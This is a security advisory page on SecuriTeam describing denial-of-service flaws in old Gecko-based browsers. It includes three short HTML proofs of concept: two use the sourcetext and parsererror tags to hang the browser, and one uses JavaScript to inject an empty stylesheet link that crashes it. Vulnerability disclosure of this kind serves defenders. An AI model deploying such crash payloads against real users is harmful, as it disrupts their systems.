SecuriTeam - Gecko Based Browsers Multiple DoS Vulnerabilities (parsererror, sourcetext, stylesheet)

Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus

Ask the Team
Mailing Lists
Advertising Info
Advisories
About SecuriTeam
Blogs

Brought to you by:

Suppliers of:

SecuriTeam in Your Inbox

New vulnerability?
New tool?
Tell us
(Our PGP key).

CanSecWest 2012

2nd Annual Cyber Security

Hack In Paris

The Gecko engine does not handle specific tags correctly, and does not validate links correctly, allowing attackers to cause DoS on the machine running the Gecko engine.

Credit:
The information has been provided by Juha-Matti Laurio .
The bug report can be found at: https://bugzilla.mozilla.org/show_bug.cgi?id=210658
The Proof of Concept of Tag Handling can be found at: http://www.milw0rm.com/id.php?id=1253
The Proof of Concept of link tag can be found at: http://www.milw0rm.com/id.php?id=1257

Website Security Scan	Code Vulnerability Test	Network Assessment Tool
Detect hidden vulnerabilities	Exhaustive automated testing	Real-time, continuous security
Get guidance from professionals	of internal or 3rd party code.	scanning for your entire network

Protect your website!
Use an External Vulnerability Scanner!
Nothing to install. First report in 1 hour!
www.beyondsecurity.com/vulnerability-scanner

Vulnerable Systems:
* Netscape Browser version 8.0.3.3
* Netscape version 7.2
* K-Meleon version 0.9
* Firefox version 1.0.7 and prior
* Mozilla suite version 1.7.12 and prior

Tag handling:
The Gecko engine is vulnerable for a DoS when managing two tags:
* <sourcetext>
* <parsererror>

By using one of this tags, it is possible to cause the system to hang with 100% CPU, and only by killing the application.

Proof of Concept 1:
< html>
< head>
  < title>sourcetext element test< /title>
< /head>
< body>
< p>< sourcetext>< /sourcetext>< /p>
< /body>
< /html>

Proof of Concept 2:
< html>
< head>
  < title>parsererror element test< /title>
< /head>
< body>
< p>< parsererror>< /parsererror>< /p>
< /body>
< /html>

Javascript link:
By adding link tag using Javascript, with empty not complete href statement, it is possible to cause Gecko based web browsers to crash.

Proof of Concept:
< !-- Brought to you By Kubbo. Now bring Kubbo the walrus; Goo-goo-gajoob. -- >

< html>
        < script language="JavaScript">
                document.write('< link rel="stylesheet" href="http://">');
        < /script>
< /html>

< !-- Affects Firefox 1.0.7 and below. Adaras ron r farliga. -->

blog comments powered by Disqus

	HP Data Protector LogBackupLocationStatus SQL Injection Vulnerabilty
	InduSoft WebStudio Unauthenticated Operations Code Execution Vulnerabilityy
	InduSoft WebStudio CEServer Operation 0x15 Code Execution Vulnerability
	HP Data Protector Notebook Extension RequestCopy SQL Injection Vulnerabilty
	HP Data Protector Notebook Extension LogClientInstallation SQL Injection Vulnerabilty
	HP Data Protector Notebook Extension GetPolicies SQL Injection Vulnerabilty
	GE Proficy Historian ihDataArchiver.exe Trusted Header Size Code Execution Vulnerability
	HP Data Protector Notebook Extension LogClientHealth SQL Injection Vulnerabilty
	HP Data Protector Notebook Extension LogCopyOperation SQL Injection Vulnerabilty
	HP Data Protector Notebook Extension FinishedCopy SQL Injection Vulnerabilty
	Novell ZENWorks Software Packaging ISGrid.Grid2.1 Text Parameter Code Execution Vulnerabilit
	Adobe Reader BMP Image RLE Decoding Code Execution Vulnerability
	Apple QuickTime H264 Matrix Conversion Code Execution Vulnerability
	Apple QuickTime FLC Delta Decompression Code Execution Vulnerability
	Apple Quicktime PnPixPat PatType 3 Parsing Code Execution Vulnerability